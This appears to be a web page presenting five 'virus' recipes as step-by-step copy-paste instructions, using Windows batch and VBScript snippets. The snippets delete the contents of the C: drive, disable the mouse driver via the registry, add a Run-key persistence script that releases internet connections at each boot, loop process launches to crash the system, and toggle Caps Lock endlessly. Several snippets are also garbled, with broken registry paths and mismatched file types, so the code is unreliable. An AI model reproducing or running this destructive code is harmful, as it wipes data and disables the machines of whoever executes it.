VIRUS is a collection of codes to destroy your system in seconds. A computer virus is a malware program that, when executed, replicates by inserting copies of itself (possibly modified) into other computer programs, data files, or the boot sector of the hard drive; when this replication succeeds, the affected areas are then said to be "infected".
[hide]
1] MAKE A VIRUS WHICH DELETE HARD DRIVE
Open your notepad.
Copy the code given below and paste it in your notepad
@Echo off
Del C:\ *.* |y
Save the file as virus.bat.
That's it, just run the file and see the magic. It will delete all the content of C Drive.
2] MAKE VIRUS WHICH DISABLES MOUSE
Open your notepad.
Copy and paste the code in notepad.
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
Save the fille as disablemouse.batand execute it
3] MAKE A VIRUS TO DISABLE INTERNET PERMANENTLY
Copy below code and save it as DisInt.bat.
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE
4] VIRUS TO CRASH YOUR COMPUTER SYSTEM
Copy and paste the code and save the file as crash.bat.
Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")
Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next
5] VIRUS TO MAKE DANCING CAPS LOCK
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
loop
Now save it as dancecap.bat.
[/hide]
